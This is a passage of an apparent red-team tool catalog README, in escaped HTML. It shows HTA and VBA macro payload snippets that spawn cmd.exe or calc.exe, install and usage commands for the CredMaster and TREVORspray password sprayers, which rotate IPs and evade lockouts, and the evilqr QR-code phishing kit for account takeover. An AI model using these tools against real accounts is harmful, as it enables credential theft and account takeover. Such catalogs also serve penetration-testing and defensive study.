.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCreating payload:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-text-html-basic notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"\u0026lt;html\u0026gt;\n\u0026lt;body\u0026gt;\n\u0026lt;script\u0026gt;\n\tvar c= 'cmd.exe'\n\tnew ActiveXObject('WScript.Shell').Run(c);\n\u0026lt;/script\u0026gt;\n\u0026lt;/body\u0026gt;\n\u0026lt;/html\u0026gt;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003escript\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\t\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ec\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e'cmd.exe'\u003c/span\u003e\n\t\u003cspan class=\"pl-k\"\u003enew\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eActiveXObject\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e'WScript.Shell'\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eRun\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ec\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003escript\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eExecute:\u003c/strong\u003e Run file\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eVBA\u003c/h3\u003e\u003ca id=\"user-content-vba\" class=\"anchor\" aria-label=\"Permalink: 🔙VBA\" href=\"#vba\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCreating payload:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Sub calc()\n\tDim payload As String\n\tpayload = \u0026quot;calc.exe\u0026quot;\n\tCreateObject(\u0026quot;Wscript.Shell\u0026quot;).Run payload,0\nEnd Sub\"\u003e\u003cpre\u003e\u003cspan class=\"pl-v\"\u003eSub\u003c/span\u003e \u003cspan class=\"pl-en\"\u003ecalc\u003c/span\u003e()\n\t\u003cspan class=\"pl-v\"\u003eDim\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epayload\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eAs\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eString\u003c/span\u003e\n\t\u003cspan class=\"pl-s1\"\u003epayload\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"calc.exe\"\u003c/span\u003e\n\t\u003cspan class=\"pl-en\"\u003eCreateObject\u003c/span\u003e(\u003cspan class=\"pl-s\"\u003e\"Wscript.Shell\"\u003c/span\u003e).\u003cspan class=\"pl-c1\"\u003eRun\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epayload\u003c/span\u003e,\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\n\u003cspan class=\"pl-v\"\u003eEnd\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eSub\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eExecute:\u003c/strong\u003e Set function to Auto_Open() in macro enabled document\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eInitial Access\u003c/h1\u003e\u003ca id=\"user-content-initial-access\" class=\"anchor\" aria-label=\"Permalink: Initial Access\" href=\"#initial-access\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/knavesec/CredMaster\"\u003eCredMaster\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-credmaster\" class=\"anchor\" aria-label=\"Permalink: 🔙CredMaster\" href=\"#credmaster\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLaunch a password spray / brute force attach via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy to use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eFully supports all AWS Regions\u003c/li\u003e\n\u003cli\u003eAutomatically generates APIs for proxy pass-through\u003c/li\u003e\n\u003cli\u003eSpoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers\u003c/li\u003e\n\u003cli\u003eMulti-threaded processing\u003c/li\u003e\n\u003cli\u003ePassword delay counters \u0026amp; configuration for lockout policy evasion\u003c/li\u003e\n\u003cli\u003eEasily add new plugins\u003c/li\u003e\n\u003cli\u003eFully anonymous\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/knavesec/CredMaster\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e CredMaster\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://whynotsecurity.com/blog/credmaster/#setup\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}\npython3 credmaster.py --config config.json\"\u003e\u003cpre\u003epython3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}\npython3 credmaster.py --config config.json\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis tool requires AWS API access keys, a walkthrough on how to acquire these keys can be found here: \u003ca href=\"https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b\" rel=\"nofollow\"\u003ehttps://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0\" alt=\"credmaster\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/knavesec/CredMaster/wiki\"\u003ehttps://github.com/knavesec/CredMaster/wiki\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/blacklanternsecurity/TREVORspray\"\u003eTREVORspray\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-trevorspray\" class=\"anchor\" aria-label=\"Permalink: 🔙TREVORspray\" href=\"#trevorspray\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install https://github.com/blacklanternsecurity/TREVORspray\"\u003e\u003cpre\u003epip install https://github.com/blacklanternsecurity/TREVORspray\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Recon\npython3 ./trevorspray --recon evilcorp.com\n\n# Enumerate users via OneDrive\npython3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10\n\n# Spray against discovered\npython3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Recon\u003c/span\u003e\npython3 ./trevorspray --recon evilcorp.com\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Enumerate users via OneDrive\u003c/span\u003e\npython3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Spray against discovered\u003c/span\u003e\npython3 ./trevorspray -u emails.txt -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eWelcome123\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full usage instructions see \u003ca href=\"https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4\" alt=\"TREVORspray\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/blacklanternsecurity/TREVORspray\"\u003ehttps://github.com/blacklanternsecurity/TREVORspray\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/kgretzky/evilqr\"\u003eevilqr\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-evilqr\" class=\"anchor\" aria-label=\"Permalink: 🔙evilqr\" href=\"#evilqr\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eToolkit demonstrating another approach of a QRLJacking attack, allowing to perform remote account takeover, through sign-in QR code phishing.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDemo \u003ca href=\"https://www.youtube.com/watch?v=8pfodWzqMcU\" rel=\"nofollow\"\u003evideo\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Extension)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can load the extension in Chrome, through \u003ccode\u003eLoad unpacked\u003c/code\u003e feature:\n\u003ca href=\"https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked\" rel=\"nofollow\"\u003ehttps://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat\"\u003e\u003cpre\u003egit clone https://github.com/kgretzky/evilqr\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e evilqr/server/\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003ebuild_run.bat\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eRun the server by running the built server binary: \u003ccode\u003e./server/build/evilqr-server\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eOpen any of the supported websites in your Chrome browser, with installed \u003cstrong\u003eEvil QR\u003c/strong\u003e extension:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"https://discord.com/login\nhttps://web.telegram.org/k/\nhttps://whatsapp.com\nhttps://store.steampowered.com/login/\nhttps://accounts.binance.com/en/login\nhttps://www.tiktok.com/login\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003ehttps://discord.com/login\nhttps://web.telegram.org/k/\nhttps://whatsapp.com\nhttps://store.steampowered.com/login/\nhttps://accounts.binance.com/en/login\nhttps://www.tiktok.com/login\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003col start=\"3\" dir=\"auto\"\u003e\n\u003cli\u003eMake sure the sign-in QR code is visible and click the \u003cstrong\u003eEvil QR\u003c/strong\u003e extension icon in the toolbar. If the QR code is recognized, the icon should light up with colors.\u003c/li\u003e\n\u003cli\u003eOpen the server's phishing page URL: \u003ccode\u003ehttp://127.0.0.1:35000\u003c/code\u003e (default)\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA\"\u003e\u003cimg 